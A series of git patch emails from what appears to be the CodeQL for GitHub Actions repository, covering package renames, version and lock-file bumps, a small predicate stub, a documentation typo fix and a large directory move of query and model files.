ql/src/qlpack.yml | 2 +- ql/test/qlpack.yml | 1 - 3 files changed, 2 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a848e8684fbf..9c2633ff3923 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -1,7 +1,7 @@ --- library: true warnOnImplicitThis: true -name: github/actions-all +name: codeql/actions-all version: 0.2.2 dependencies: codeql/util: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c8d5a9f4ce3b..5fbb863d746c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,6 +1,6 @@ --- library: false -name: github/actions-queries +name: codeql/actions-queries version: 0.2.2 groups: [actions, queries] suites: codeql-suites diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 893532481eca..668474866fce 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -7,4 +7,3 @@ dependencies: extractor: actions tests: . warnOnImplicitThis: true - From 5aa3328b07d3b45f700d3baa3b1290d01d894fc1 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 12:46:39 -0500 Subject: [PATCH 689/707] Upgrade to latest package versions --- ql/lib/codeql-pack.lock.yml | 24 +++++++++++++----------- ql/src/codeql-pack.lock.yml | 24 +++++++++++++----------- ql/test/codeql-pack.lock.yml | 24 +++++++++++++----------- 3 files changed, 39 insertions(+), 33 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index c4ef87bc2512..2f4b6f858370 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,25 +2,27 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.10 + version: 1.0.12 codeql/dataflow: - version: 1.1.4 + version: 1.1.6 codeql/javascript-all: - version: 2.0.2 + version: 2.1.1 codeql/mad: - version: 1.0.10 + version: 1.0.12 codeql/regex: - version: 1.0.10 + version: 1.0.12 codeql/ssa: - version: 1.0.10 + version: 1.0.12 + codeql/threat-models: + version: 1.0.12 codeql/tutorial: - version: 1.0.10 + version: 1.0.12 codeql/typetracking: - version: 1.0.10 + version: 1.0.12 codeql/util: - version: 1.0.10 + version: 1.0.12 codeql/xml: - version: 1.0.10 + version: 1.0.12 codeql/yaml: - version: 1.0.10 + version: 1.0.12 compiled: false From 1fb707f080fb44fcd9a639acc488d5b5ca02bea2 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 13:00:24 -0500 Subject: [PATCH 690/707] Bump minor version to prepare for public release --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 9c2633ff3923..4bc32f934d9b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: codeql/actions-all -version: 0.2.2 +version: 0.3.0 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 5fbb863d746c..70f1e4945a1c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: codeql/actions-queries -version: 0.2.2 +version: 0.3.0 groups: [actions, queries] suites: codeql-suites extractor: actions From 4a9355c5def2375ed7a91f324052c25876d1c682 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Fri, 13 Dec 2024 14:39:19 -0500 Subject: [PATCH 691/707] Add required signature predicate implementation --- .../actions/dataflow/internal/TaintTrackingPrivate.qll | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index 2dde52035767..60d5a8d7baaa 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -32,3 +32,9 @@ predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nod */ bindingset[node] predicate defaultImplicitTaintRead(DataFlow::Node node, DataFlow::ContentSet c) { none() } + +/** + * Holds if the additional step from `src` to `sink` should be considered in + * speculative taint flow exploration. + */ +predicate speculativeTaintStep(DataFlow::Node src, DataFlow::Node sink) { none() } From 1370102d45c59c31d3d49c43ec3cea6ead7e13a8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 14 Dec 2024 10:10:50 +0100 Subject: [PATCH 692/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dd83f7052196..22f90e2ca38e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.2.2 +version: 0.2.3 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 90c64f0b7469..dcb4c76cbe25 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.2.2 +version: 0.2.3 groups: [actions, queries] suites: codeql-suites extractor: javascript From 2949098a27a1156c647fbe32a14b5c8f29aae24f Mon Sep 17 00:00:00 2001 From: Sam Partington Date: Mon, 16 Dec 2024 15:40:38 +0000 Subject: [PATCH 693/707] Fix typo in UnversionedImmutableAction.md --- ql/src/Security/CWE-829/UnversionedImmutableAction.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.md b/ql/src/Security/CWE-829/UnversionedImmutableAction.md index 33701ec27e67..cc371738d4aa 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.md +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.md @@ -2,7 +2,7 @@ ## Description -Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version +Using an immutable action without indicating proper semantic version will result in the version being resolved to a tag that is mutable. This means the action code can change between runs and without the user's knowledge. Using an immutable action with proper semantic versioning will resolve to the exact version of the action stored in the GitHub package registry. The action code will not change between runs. ## Recommendations From 237a6f11f9c0398197131534d534ccf8d9088e35 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 13:32:55 -0500 Subject: [PATCH 694/707] Bump version --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4bc32f934d9b..7fc284d6957a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: codeql/actions-all -version: 0.3.0 +version: 0.3.1 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 70f1e4945a1c..11b5260ce189 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: codeql/actions-queries -version: 0.3.0 +version: 0.3.1 groups: [actions, queries] suites: codeql-suites extractor: actions From ee7680df846a5dc1b550bd2d2b11fc27bbc44711 Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Wed, 18 Dec 2024 14:35:15 -0500 Subject: [PATCH 695/707] Move into `actions` subdirectory to prepare for migration to `github/codeql` --- .github/workflows/publish.yml | 33 ----------------- .github/workflows/test.yml | 37 ------------------- .gitignore | 7 ---- BUILD.bazel | 20 ---------- {extractor => actions/extractor}/BUILD.bazel | 0 .../extractor}/codeql-extractor.yml | 0 .../extractor}/tools/autobuild-impl.ps1 | 0 .../extractor}/tools/autobuild.cmd | 0 .../extractor}/tools/autobuild.sh | 0 {ql => actions/ql}/lib/actions.qll | 0 {ql => actions/ql}/lib/codeql-pack.lock.yml | 0 {ql => actions/ql}/lib/codeql/Locations.qll | 0 {ql => actions/ql}/lib/codeql/actions/Ast.qll | 0 .../ql}/lib/codeql/actions/Bash.qll | 0 {ql => actions/ql}/lib/codeql/actions/Cfg.qll | 0 .../ql}/lib/codeql/actions/Consistency.ql | 0 .../ql}/lib/codeql/actions/DataFlow.qll | 0 .../ql}/lib/codeql/actions/Helper.qll | 0 .../ql}/lib/codeql/actions/PowerShell.qll | 0 .../ql}/lib/codeql/actions/TaintTracking.qll | 0 ...efaultableCodeQLInitiatlizeActionQuery.qll | 0 .../lib/codeql/actions/ast/internal/Ast.qll | 0 .../lib/codeql/actions/ast/internal/Yaml.qll | 0 .../ql}/lib/codeql/actions/config/Config.qll | 0 .../actions/config/ConfigExtensions.qll | 0 .../actions/controlflow/BasicBlocks.qll | 0 .../actions/controlflow/internal/Cfg.qll | 0 .../codeql/actions/dataflow/ExternalFlow.qll | 0 .../codeql/actions/dataflow/FlowSources.qll | 0 .../lib/codeql/actions/dataflow/FlowSteps.qll | 0 .../codeql/actions/dataflow/TaintSteps.qll | 0 .../internal/DataFlowImplSpecific.qll | 0 .../dataflow/internal/DataFlowPrivate.qll | 0 .../dataflow/internal/DataFlowPublic.qll | 0 .../internal/ExternalFlowExtensions.qll | 0 .../internal/TaintTrackingImplSpecific.qll | 0 .../internal/TaintTrackingPrivate.qll | 0 .../actions/ideContextual/IDEContextual.qll | 0 .../codeql/actions/ideContextual/printAst.qll | 0 .../security/ArgumentInjectionQuery.qll | 0 .../security/ArtifactPoisoningQuery.qll | 0 .../actions/security/CachePoisoningQuery.qll | 0 .../actions/security/CodeInjectionQuery.qll | 0 .../security/CommandInjectionQuery.qll | 0 .../codeql/actions/security/ControlChecks.qll | 0 .../security/EnvPathInjectionQuery.qll | 0 .../actions/security/EnvVarInjectionQuery.qll | 0 .../security/OutputClobberingQuery.qll | 0 .../actions/security/PoisonableSteps.qll | 0 .../actions/security/RequestForgeryQuery.qll | 0 .../security/SecretExfiltrationQuery.qll | 0 .../actions/security/SelfHostedQuery.qll | 0 .../security/UntrustedCheckoutQuery.qll | 0 .../UseOfKnownVulnerableActionQuery.qll | 0 .../UseOfUnversionedImmutableAction.qll | 0 .../ql}/lib/codeql/files/FileSystem.qll | 0 .../ext/config/argument_injection_sinks.yml | 0 .../ql}/lib/ext/config/context_event_map.yml | 0 .../config/externally_triggereable_events.yml | 0 .../ql}/lib/ext/config/immutable_actions.yml | 0 .../ql}/lib/ext/config/poisonable_steps.yml | 0 .../ext/config/untrusted_event_properties.yml | 0 .../lib/ext/config/untrusted_gh_command.yml | 0 .../lib/ext/config/untrusted_git_command.yml | 0 .../ql}/lib/ext/config/vulnerable_actions.yml | 0 .../lib/ext/config/workflow_runtime_data.yml | 0 ...ctions_actions-runner-controller.model.yml | 0 .../composite-actions/adap_flower.model.yml | 0 .../agoric_agoric-sdk.model.yml | 0 .../airbnb_lottie-ios.model.yml | 0 .../airbytehq_airbyte.model.yml | 0 .../amazon-ion_ion-java.model.yml | 0 .../composite-actions/anchore_grype.model.yml | 0 .../composite-actions/anchore_syft.model.yml | 0 .../angular_dev-infra.model.yml | 0 .../ansible_ansible-lint.model.yml | 0 .../composite-actions/ansible_awx.model.yml | 0 .../apache_arrow-datafusion.model.yml | 0 .../apache_arrow-rs.model.yml | 0 .../composite-actions/apache_arrow.model.yml | 0 .../apache_bookkeeper.model.yml | 0 .../composite-actions/apache_brpc.model.yml | 0 .../apache_camel-k.model.yml | 0 .../composite-actions/apache_camel.model.yml | 0 .../composite-actions/apache_flink.model.yml | 0 .../apache_incubator-kie-tools.model.yml | 0 .../composite-actions/apache_nuttx.model.yml | 0 .../apache_opendal.model.yml | 0 .../composite-actions/apache_pekko.model.yml | 0 .../apache_pulsar-helm-chart.model.yml | 0 .../apache_superset.model.yml | 0 .../appflowy-io_appflowy.model.yml | 0 .../aptos-labs_aptos-core.model.yml | 0 .../archivesspace_archivesspace.model.yml | 0 .../armadaproject_armada.model.yml | 0 .../composite-actions/armbian_build.model.yml | 0 .../auth0_auth0-java.model.yml | 0 .../auth0_auth0.net.model.yml | 0 .../auth0_auth0.swift.model.yml | 0 .../autogluon_autogluon.model.yml | 0 .../composite-actions/avaiga_taipy.model.yml | 0 .../aws-amplify_amplify-cli.model.yml | 0 ...ertools_powertools-lambda-python.model.yml | 0 .../aws_amazon-vpc-cni-k8s.model.yml | 0 .../aws_karpenter-provider-aws.model.yml | 0 .../awslabs_amazon-eks-ami.model.yml | 0 .../awslabs_aws-lambda-rust-runtime.model.yml | 0 .../azerothcore_azerothcore-wotlk.model.yml | 0 .../azure_azure-datafactory.model.yml | 0 .../badges_shields.model.yml | 0 .../balena-io_etcher.model.yml | 0 .../balena-os_balena-engine.model.yml | 0 .../ben-manes_caffeine.model.yml | 0 .../composite-actions/bokeh_bokeh.model.yml | 0 .../botpress_botpress.model.yml | 0 ...intree_braintree-android-drop-in.model.yml | 0 .../braintree_braintree_android.model.yml | 0 .../broadinstitute_gatk.model.yml | 0 .../canonical_multipass.model.yml | 0 .../chia-network_actions.model.yml | 0 .../chia-network_chia-blockchain.model.yml | 0 .../chipsalliance_chisel.model.yml | 0 .../chocobozzz_peertube.model.yml | 0 .../cilium_cilium-cli.model.yml | 0 .../composite-actions/cilium_cilium.model.yml | 0 .../citusdata_citus.model.yml | 0 .../clerk_javascript.model.yml | 0 .../cloud-custodian_cloud-custodian.model.yml | 0 .../cloudflare_workers-sdk.model.yml | 0 ...cloudfoundry_cloud_controller_ng.model.yml | 0 .../composite-actions/coder_coder.model.yml | 0 .../composite-actions/coil-kt_coil.model.yml | 0 .../commaai_openpilot.model.yml | 0 .../conan-io_conan-center-index.model.yml | 0 .../corretto_corretto-8.model.yml | 0 .../cosmos_cosmos-sdk.model.yml | 0 .../composite-actions/coturn_coturn.model.yml | 0 .../crunchydata_postgres-operator.model.yml | 0 .../composite-actions/cvc5_cvc5.model.yml | 0 .../composite-actions/d2l-ai_d2l-en.model.yml | 0 ...build-check-deploy-gradle-action.model.yml | 0 .../datadog_dd-trace-dotnet.model.yml | 0 .../datadog_dd-trace-go.model.yml | 0 .../datadog_dd-trace-js.model.yml | 0 .../datafuselabs_databend.model.yml | 0 .../davatorium_rofi.model.yml | 0 .../debezium_debezium.model.yml | 0 .../defenseunicorns_zarf.model.yml | 0 ...lifiees_demarches-simplifiees.fr.model.yml | 0 ...of-veterans-affairs_vets-website.model.yml | 0 .../devexpress_devextreme.model.yml | 0 .../diggerhq_digger.model.yml | 0 .../diku-dk_futhark.model.yml | 0 .../discourse_.github.model.yml | 0 .../dnsjava_dnsjava.model.yml | 0 .../dotintent_react-native-ble-plx.model.yml | 0 .../dotnet_docs-tools.model.yml | 0 .../dotnet_dotnet-monitor.model.yml | 0 .../dragonflydb_dragonfly.model.yml | 0 .../drawpile_drawpile.model.yml | 0 .../eksctl-io_eksctl.model.yml | 0 .../elastic_apm-agent-dotnet.model.yml | 0 .../elastic_apm-agent-java.model.yml | 0 .../elastic_apm-server.model copy.yml | 0 .../elementor_elementor.model.yml | 0 .../composite-actions/emberjs_data.model.yml | 0 .../composite-actions/emqx_emqx.model.yml | 0 .../eonasdan_tempus-dominus.model.yml | 0 .../composite-actions/erlang_otp.model.yml | 0 .../esphome_esphome.model.yml | 0 .../composite-actions/expensify_app.model.yml | 0 .../composite-actions/expo_expo.model.yml | 0 .../expo_vscode-expo.model.yml | 0 ...xternal-secrets_external-secrets.model.yml | 0 .../facebook_buck2.model.yml | 0 .../composite-actions/facebook_flow.model.yml | 0 .../composite-actions/facebook_yoga.model.yml | 0 .../facebookresearch_xformers.model.yml | 0 .../fastly_compute-actions.model.yml | 0 .../composite-actions/felangel_bloc.model.yml | 0 .../firebase_firebase-ios-sdk.model.yml | 0 .../flagsmith_flagsmith.model.yml | 0 .../flaxengine_flaxengine.model.yml | 0 ...pperdevices_flipperzero-firmware.model.yml | 0 .../composite-actions/fluxcd_flux2.model.yml | 0 .../forcedotcom_salesforcedx-vscode.model.yml | 0 .../fossasia_visdom.model.yml | 0 .../freckle_stack-action.model.yml | 0 .../freeradius_freeradius-server.model.yml | 0 .../composite-actions/gaphor_gaphor.model.yml | 0 .../getsentry_action-release.model.yml | 0 .../github_codeql-action.model.yml | 0 .../composite-actions/github_ruby.model.yml | 0 .../gittools_gitversion.model.yml | 0 .../go-spatial_tegola.model.yml | 0 .../goauthentik_authentik.model.yml | 0 .../godotengine_godot.model.yml | 0 .../composite-actions/google_dagger.model.yml | 0 .../googleapis_java-cloud-bom.model.yml | 0 .../googleapis_sdk-platform-java.model.yml | 0 ...ecloudplatform_dataflowtemplates.model.yml | 0 ...ooglecloudplatform_magic-modules.model.yml | 0 .../gravitational_teleport.model.yml | 0 .../grote_transportr.model.yml | 0 .../hashicorp_nomad.model.yml | 0 .../hashicorp_terraform.model.yml | 0 .../hashicorp_vault.model.yml | 0 .../home-assistant_android.model.yml | 0 .../homebrew_actions.model.yml | 0 ...erledger_aries-cloudagent-python.model.yml | 0 .../hyperledger_fabric-samples.model.yml | 0 .../igniterealtime_openfire.model.yml | 0 .../infracost_actions.model.yml | 0 ...nspektor-gadget_inspektor-gadget.model.yml | 0 .../intel-analytics_ipex-llm.model.yml | 0 .../ionic-team_ionic-framework.model.yml | 0 .../ionic-team_ionicons.model.yml | 0 .../ionic-team_stencil.model.yml | 0 .../composite-actions/ipfs_aegir.model.yml | 0 .../jetbrains_jetbrainsruntime.model.yml | 0 .../jhipster_generator-jhipster.model.yml | 0 .../jsocol_django-ratelimit.model.yml | 0 .../juicedata_juicefs.model.yml | 0 .../jupyter_docker-stacks.model.yml | 0 .../keycloak_keycloak.model.yml | 0 .../composite-actions/kserve_kserve.model.yml | 0 .../kubeflow_katib.model.yml | 0 .../kubeflow_training-operator.model.yml | 0 .../kubernetes-sigs_karpenter.model.yml | 0 .../kubernetes-sigs_kwok.model.yml | 0 .../kubescape_kubescape.model.yml | 0 .../kubeshop_botkube.model.yml | 0 .../kyverno_kyverno.model.yml | 0 .../composite-actions/lancedb_lance.model.yml | 0 .../launchdarkly_ios-client-sdk.model.yml | 0 .../layer5labs_meshmap-snapshot.model.yml | 0 .../ldc-developers_ldc.model.yml | 0 .../ledgerhq_ledger-live.model.yml | 0 .../composite-actions/lerna_lerna.model.yml | 0 .../composite-actions/lf-edge_eve.model.yml | 0 .../libgit2_libgit2.model.yml | 0 .../lightning-ai_pytorch-lightning.model.yml | 0 .../lightning-ai_torchmetrics.model.yml | 0 .../linkerd_linkerd2.model.yml | 0 .../logseq_publish-spa.model.yml | 0 .../macvim-dev_macvim.model.yml | 0 .../mamba-org_mamba.model.yml | 0 .../maplibre_maplibre-native.model.yml | 0 .../mastodon_mastodon.model.yml | 0 .../mavlink_qgroundcontrol.model.yml | 0 .../mdanalysis_mdanalysis.model.yml | 0 .../medic_cht-core.model.yml | 0 .../medusajs_medusa.model.yml | 0 .../metabase_metabase.model.yml | 0 ...etamask_action-create-release-pr.model.yml | 0 .../metamask_action-npm-publish.model.yml | 0 .../microsoft_fluentui.model.yml | 0 .../microsoft_playwright.model.yml | 0 .../composite-actions/microsoft_wsl.model.yml | 0 .../milvus-io_milvus.model.yml | 0 .../composite-actions/mlflow_mlflow.model.yml | 0 .../modin-project_modin.model.yml | 0 .../mozilla_addons-server.model.yml | 0 .../mozilla_bedrock.model.yml | 0 .../mozilla_sccache.model.yml | 0 .../msys2_setup-msys2.model.yml | 0 .../mumble-voip_mumble.model.yml | 0 .../composite-actions/nasa_fprime.model.yml | 0 .../nats-io_nats-server.model.yml | 0 ..._optic-release-automation-action.model.yml | 0 .../composite-actions/nektos_act.model.yml | 0 ...4j-contrib_neo4j-apoc-procedures.model.yml | 0 .../neondatabase_neon.model.yml | 0 .../composite-actions/neovim_neovim.model.yml | 0 .../composite-actions/nhost_nhost.model.yml | 0 .../nix-community_nixos-wsl.model.yml | 0 .../composite-actions/novuhq_novu.model.yml | 0 .../composite-actions/nymtech_nym.model.yml | 0 .../obsproject_obs-studio.model.yml | 0 .../composite-actions/ocaml_dune.model.yml | 0 .../oneflow-inc_oneflow.model.yml | 0 ...metry_opentelemetry-ruby-contrib.model.yml | 0 ...pen-telemetry_opentelemetry-ruby.model.yml | 0 .../open-watcom_open-watcom-v2.model.yml | 0 .../openapitools_openapi-generator.model.yml | 0 .../composite-actions/openjdk_jdk.model.yml | 0 ...pensearch-project_opensearch-net.model.yml | 0 .../opensearch-project_security.model.yml | 0 .../opentrons_opentrons.model.yml | 0 .../openvinotoolkit_openvino.model.yml | 0 ...enzeppelin-contracts-upgradeable.model.yml | 0 ...nzeppelin_openzeppelin-contracts.model.yml | 0 .../composite-actions/oppia_oppia.model.yml | 0 .../composite-actions/oracle_graal.model.yml | 0 .../oracle_truffleruby.model.yml | 0 .../orhun_git-cliff.model.yml | 0 .../composite-actions/oven-sh_bun.model.yml | 0 .../owntracks_android.model.yml | 0 .../pandas-dev_pandas.model.yml | 0 .../pardeike_harmony.model.yml | 0 .../pennylaneai_pennylane.model.yml | 0 .../phalcon_cphalcon.model.yml | 0 .../philosowaffle_peloton-to-garmin.model.yml | 0 .../composite-actions/php_php-src.model.yml | 0 .../phpdocumentor_phpdocumentor.model.yml | 0 ...necone-io_pinecone-python-client.model.yml | 0 .../composite-actions/pixijs_pixijs.model.yml | 0 .../posthog_posthog.model.yml | 0 .../composite-actions/primer_react.model.yml | 0 .../project-chip_connectedhomeip.model.yml | 0 .../projectnessie_nessie.model.yml | 0 .../composite-actions/psf_black.model.yml | 0 .../pyca_cryptography.model.yml | 0 .../pyg-team_pytorch_geometric.model.yml | 0 .../python-poetry_poetry.model.yml | 0 .../composite-actions/python_mypy.model.yml | 0 .../quarto-dev_quarto-cli.model.yml | 0 .../composite-actions/quay_clair.model.yml | 0 .../quickwit-oss_quickwit.model.yml | 0 .../composite-actions/r-lib_actions.model.yml | 0 .../randombit_botan.model.yml | 0 .../raspberrypi_documentation.model.yml | 0 .../ray-project_kuberay.model.yml | 0 .../readthedocs_actions.model.yml | 0 .../reflex-dev_reflex.model.yml | 0 .../renovatebot_renovate.model.yml | 0 .../rethinkdb_rethinkdb.model.yml | 0 .../composite-actions/risc0_risc0.model.yml | 0 .../rocketchat_rocket.chat.model.yml | 0 .../composite-actions/rook_rook.model.yml | 0 .../composite-actions/roots_trellis.model.yml | 0 .../composite-actions/ruby_debug.model.yml | 0 .../composite-actions/ruby_ruby.model.yml | 0 .../composite-actions/rusefi_rusefi.model.yml | 0 .../saltstack_salt.model.yml | 0 .../composite-actions/saltstack_salt.yml | 0 .../sap_sapmachine.model.yml | 0 .../scala-native_scala-native.model.yml | 0 .../composite-actions/scitools_iris.model.yml | 0 .../scylladb_scylla-operator.model.yml | 0 .../shader-slang_slang.model.yml | 0 .../shaka-project_shaka-player.model.yml | 0 ...ode_react-webpack-rails-tutorial.model.yml | 0 .../simple-icons_simple-icons.model.yml | 0 .../slint-ui_slint.model.yml | 0 .../solidusio_solidus.model.yml | 0 .../composite-actions/solo-io_gloo.model.yml | 0 .../composite-actions/sonarr_sonarr.model.yml | 0 .../sonic-pi-net_sonic-pi.model.yml | 0 .../spacedriveapp_spacedrive.model.yml | 0 .../spockframework_spock.model.yml | 0 .../spring-io_initializr.model.yml | 0 .../spring-io_start.spring.io.model.yml | 0 .../spring-projects_spring-boot.model.yml | 0 ...spring-projects_spring-framework.model.yml | 0 .../spring-projects_spring-graphql.model.yml | 0 .../square_workflow-kotlin.model.yml | 0 .../stefanprodan_podinfo.model.yml | 0 .../composite-actions/stellar_go.model.yml | 0 .../streetsidesoftware_cspell.model.yml | 0 .../subquery_subql.model.yml | 0 .../swagger-api_swagger-codegen.model.yml | 0 .../swagger-api_swagger-parser.model.yml | 0 .../tarantool_tarantool.model.yml | 0 .../telepresenceio_telepresence.model.yml | 0 .../tensorflow_datasets.model.yml | 0 .../texstudio-org_texstudio.model.yml | 0 .../toeverything_affine.model.yml | 0 .../treeverse_lakefs.model.yml | 0 .../trezor_trezor-firmware.model.yml | 0 .../tribler_tribler.model.yml | 0 .../trunk-io_trunk-action.model.yml | 0 .../composite-actions/unidata_metpy.model.yml | 0 .../unstructured-io_unstructured.model.yml | 0 .../composite-actions/vercel_turbo.model.yml | 0 .../vesoft-inc_nebula.model.yml | 0 .../composite-actions/vkcom_vkui.model.yml | 0 .../vuetifyjs_vuetify.model.yml | 0 .../wagoodman_dive.model.yml | 0 ...lletconnect_walletconnectswiftv2.model.yml | 0 .../composite-actions/wazuh_wazuh.model.yml | 0 .../web-infra-dev_rspack.model.yml | 0 .../webassembly_wabt.model.yml | 0 .../composite-actions/wntrblm_nox.model.yml | 0 .../composite-actions/xrplf_rippled.model.yml | 0 .../composite-actions/zcash_zcash.model.yml | 0 .../zenml-io_zenml.model.yml | 0 .../composite-actions/zeroc-ice_ice.model.yml | 0 .../0xpolygon_polygon-edge.model.yml | 0 .../reusable-workflows/8vim_8vim.model.yml | 0 .../actions_reusable-workflows.model.yml | 0 .../reusable-workflows/adap_flower.model.yml | 0 .../aio-libs_multidict.model.yml | 0 .../aio-libs_yarl.model.yml | 0 .../airbytehq_airbyte.model.yml | 0 .../alphagov_collections.model.yml | 0 .../alphagov_frontend.model.yml | 0 .../alphagov_publishing-api.model.yml | 0 .../reusable-workflows/apache_druid.model.yml | 0 .../reusable-workflows/apache_flink.model.yml | 0 .../reusable-workflows/apache_spark.model.yml | 0 .../argilla-io_argilla.model.yml | 0 .../argoproj_argo-cd.model.yml | 0 .../argoproj_argo-rollouts.model.yml | 0 .../aws-amplify_amplify-ui.model.yml | 0 .../reusable-workflows/azure_apiops.model.yml | 0 .../azure_mlops-templates.model.yml | 0 .../bbq-beets_avocaddo-cmw.model.yml | 0 .../bbq-beets_mobile-ci-cd.model.yml | 0 .../bbq-beets_yujincat-action.model.yml | 0 .../bdunderscore_modular-avatar.model.yml | 0 .../benc-uk_workflow-dispatch.model.yml | 0 .../bridgecrewio_checkov.model.yml | 0 .../bugsnag_bugsnag-ruby.model.yml | 0 ...ecodealliance_wasm-micro-runtime.model.yml | 0 .../celo-org_celo-blockchain.model.yml | 0 .../cemu-project_cemu.model.yml | 0 .../cesiumgs_cesium-unreal.model.yml | 0 .../reusable-workflows/cgal_cgal.model.yml | 0 .../checkstyle_checkstyle.model.yml | 0 .../chia-network_actions.model.yml | 0 .../chipsalliance_chisel.model.yml | 0 .../clickhouse_clickhouse.model.yml | 0 .../cloudfoundry_cli.model.yml | 0 ...thub-action-matrix-outputs-write.model.yml | 0 .../cocotb_cocotb.model.yml | 0 .../codeigniter4_codeigniter4.model.yml | 0 .../com-lihaoyi_mill.model.yml | 0 .../cosmos_ibc-go.model.yml | 0 .../crowdsecurity_crowdsec.model.yml | 0 .../cryptomator_cryptomator.model.yml | 0 .../daeuniverse_dae.model.yml | 0 .../dafny-lang_dafny.model.yml | 0 .../dagger_dagger.model.yml | 0 .../dash-industry-forum_dash.js.model.yml | 0 .../datadog_dd-trace-go.model.yml | 0 .../datadog_dd-trace-py.model.yml | 0 .../datafuselabs_databend.model.yml | 0 .../dbt-labs_dbt-bigquery.model.yml | 0 .../dbt-labs_dbt-core.model.yml | 0 .../dbt-labs_dbt-snowflake.model.yml | 0 .../decidim_decidim.model.yml | 0 .../defectdojo_django-defectdojo.model.yml | 0 